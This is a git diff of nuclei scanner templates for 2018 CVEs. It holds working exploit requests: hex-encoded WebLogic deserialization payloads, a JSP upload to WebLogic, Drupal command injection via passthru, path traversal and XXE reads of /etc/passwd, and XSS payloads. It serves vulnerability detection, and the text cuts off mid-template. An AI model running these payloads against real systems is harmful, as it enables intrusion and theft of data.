"{{hex_decode('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')}}" - read: 1024 - - data: "{{hex_decode('000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078')}}" - read: 1024 - - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}" - read: 1024 - - host: - - "{{Hostname}}" - - read-size: 1024 - matchers: - - type: regex - regex: - - "\\$Proxy[0-9]+" - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2018/CVE-2018-2791.yaml b/nuclei-templates/CVE-2018/CVE-2018-2791.yaml new file mode 100644 index 0000000000..0d0071f34e --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-2791.yaml @@ -0,0 +1,49 @@ +id: CVE-2018-2791 + +info: + name: Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting + author: madrobot,leovalcante + severity: high + description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP + to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while + the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access + to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.securitytracker.com/id/1040695 + - http://www.securityfocus.com/bid/103800 + - https://www.exploit-db.com/exploits/44752/ + - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + - https://nvd.nist.gov/vuln/detail/CVE-2018-2791 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2018-2791 + tags: cve,cve2018,oracle,xss,wcs + +requests: + - raw: + - | + GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{BaseURL}} + + - | + GET /cs/Satellite?destpage="&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1 + Host: {{BaseURL}} + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '/graphics/common/screen/dotclear.gif' + + - type: word + part: body + words: + - '' + - 'Missing translation key' + condition: and + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2018/CVE-2018-2893.yaml b/nuclei-templates/CVE-2018/CVE-2018-2893.yaml deleted file mode 100644 index b4cd70ff8e..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-2893.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2018-2893 - -info: - name: Oracle WebLogic Server - Remote Code Execution - author: milo2012 - severity: critical - description: | - The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. - reference: - - https://www.anquanke.com/post/id/152164 - - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL - - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 - - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-2893 - tags: cve,cve2018,weblogic,network,deserialization,rce,oracle - metadata: - max-request: 1 - -tcp: - - inputs: - - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" - read: 1024 - - data: "000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078" - type: hex - read: 1024 - - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" - type: hex - read: 1024 - - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" - type: hex - read: 1024 - - host: - - "{{Hostname}}" - - matchers: - - type: word - part: raw - words: - - "StreamMessageImpl cannot be cast to weblogic" - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2018/CVE-2018-2894.yaml b/nuclei-templates/CVE-2018/CVE-2018-2894.yaml new file mode 100644 index 0000000000..06c12a5593 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-2894.yaml @@ -0,0 +1,97 @@ +id: CVE-2018-2894 + +info: + name: Oracle WebLogic Server - Remote Code Execution + author: geeknik,pdteam + severity: critical + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. + reference: + - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 + - https://nvd.nist.gov/vuln/detail/CVE-2018-2894 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-2894 + tags: cve,cve2018,oracle,weblogic,rce + +requests: + - raw: + - | + POST /ws_utc/resources/setting/options HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 + + - | + POST /ws_utc/resources/setting/keystore HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_name" + + {{randstr}} + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_edit_mode" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_front" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_changed" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" + Content-Type: application/octet-stream + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + + <% + String cve = "CVE-2018-2894"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + ------WebKitFormBoundaryuim0dyiDSPBPu31g-- + + - | + GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: id + internal: true + group: 1 + regex: + - '([0-9]+){{randstr}}' + + matchers: + - type: word + words: + - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) + +# Enhanced by mp on 2022/05/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-3760.yaml b/nuclei-templates/CVE-2018/CVE-2018-3760.yaml new file mode 100644 index 0000000000..d4508b7285 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-3760.yaml @@ -0,0 +1,48 @@ +id: CVE-2018-3760 + +info: + name: Ruby On Rails Path Traversal + author: 0xrudra,pikpikcu + severity: high + description: | + Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. + There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. + reference: + - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + - https://seclists.org/oss-sec/2018/q2/210 + - https://xz.aliyun.com/t/2542 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-3760 + cwe-id: CWE-200 + tags: cve,cve2018,rails,lfi,ruby + +requests: + - raw: + - | + GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + - | + GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: path + internal: true + part: body + regex: + - "/etc/passwd is no longer under a load path: (.*?)," + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml b/nuclei-templates/CVE-2018/CVE-2018-5715.yaml deleted file mode 100644 index fc043311e1..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-5715.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-5715 -info: - name: SugarCRM 3.5.1 - Reflected XSS - author: edoardottt - severity: medium - description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable). - reference: - - https://www.exploit-db.com/exploits/43683 - - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 - - https://m4k4br0.github.io/sugarcrm-xss/ - - https://www.exploit-db.com/exploits/43683/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-5715 - cwe-id: CWE-79 - metadata: - google-dork: intext:"SugarCRM Inc. All Rights Reserved" - shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - tags: cve,cve2018,sugarcrm,xss -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '&"/>=&"><< Back

' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-6200.yaml b/nuclei-templates/CVE-2018/CVE-2018-6200.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-6200.yaml rename to nuclei-templates/CVE-2018/CVE-2018-6200.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7251.yaml b/nuclei-templates/CVE-2018/CVE-2018-7251.yaml deleted file mode 100644 index 90f7adb2ad..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7251.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-7251 - -info: - name: Anchor CMS 0.12.3 - Error Log Exposure - author: pdteam - severity: critical - description: | - Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred. - reference: - - https://github.com/anchorcms/anchor-cms/issues/1247 - - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html - - https://twitter.com/finnwea/status/965279233030393856 - - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html - - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 - - https://nvd.nist.gov/vuln/detail/CVE-2018-7251 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-7251 - cwe-id: CWE-200 - tags: cve,cve2018,anchorcms,logs,error - -requests: - - method: GET - path: - - '{{BaseURL}}/anchor/errors.log' - matchers: - - type: word - words: - - '"date":' - - '"message":' - - '"trace":[' - condition: and - - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2018/CVE-2018-7490.yaml b/nuclei-templates/CVE-2018/CVE-2018-7490.yaml deleted file mode 100644 index 36e7640822..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7490.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-7490 - -info: - name: uWSGI PHP Plugin Local File Inclusion - author: madrobot - severity: high - description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion. - reference: - - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html - - https://www.exploit-db.com/exploits/44223/ - - https://www.debian.org/security/2018/dsa-4142 - - https://nvd.nist.gov/vuln/detail/CVE-2018-7490 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-7490 - cwe-id: CWE-22 - tags: cve,cve2018,uwsgi,php,lfi,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2018/CVE-2018-7602.yaml b/nuclei-templates/CVE-2018/CVE-2018-7602.yaml deleted file mode 100644 index 911af78329..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-7602.yaml +++ /dev/null @@ -1,83 +0,0 @@ -id: CVE-2018-7602 - -info: - name: Drupal - Remote Code Execution - author: princechaddha - severity: critical - description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. - reference: - - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 - - https://www.drupal.org/sa-core-2018-004 - - https://www.exploit-db.com/exploits/44557/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-7602 - epss-score: 0.97425 - metadata: - max-request: 4 - shodan-query: http.component:"drupal" - tags: cve2018,drupal,authenticated,kev,cisa,vulhub,edb,cve - -http: - - raw: - - | - POST /?q=user%2Flogin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - form_id=user_login&name={{username}}&pass={{password}}&op=Log+in - - - | - GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1 - Host: {{Hostname}} - - - | - POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account - - - | - POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - form_build_id={{form_build_id}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers: - - type: word - words: - - 'CVE-2018-7602-POC' - - extractors: - - type: regex - part: body - name: userid - internal: true - group: 1 - regex: - - '' - - - type: regex - part: body - name: form_build_id - internal: true - group: 1 - regex: - - '' - -# Enhanced by mp on 2022/05/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-8033.yaml b/nuclei-templates/CVE-2018/CVE-2018-8033.yaml new file mode 100644 index 0000000000..8b3bf3cb60 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-8033.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-8033 + +info: + name: Apache OFBiz XXE + author: pikpikcu + severity: high + description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 + reference: + - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-8033 + cwe-id: CWE-200 + tags: cve,cve2018,apache,ofbiz,xxe + +requests: + - raw: + - | + POST /webtools/control/xmlrpc HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: application/xml + + ]>&disclose; + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-8715.yaml b/nuclei-templates/CVE-2018/CVE-2018-8715.yaml new file mode 100644 index 0000000000..c395c9e28c --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-8715.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-8715 + +info: + name: AppWeb Authentication Bypass vulnerability + author: milo2012 + severity: high + description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. + reference: + - https://github.com/embedthis/appweb/issues/610 + - https://blogs.securiteam.com/index.php/archives/3676 + - 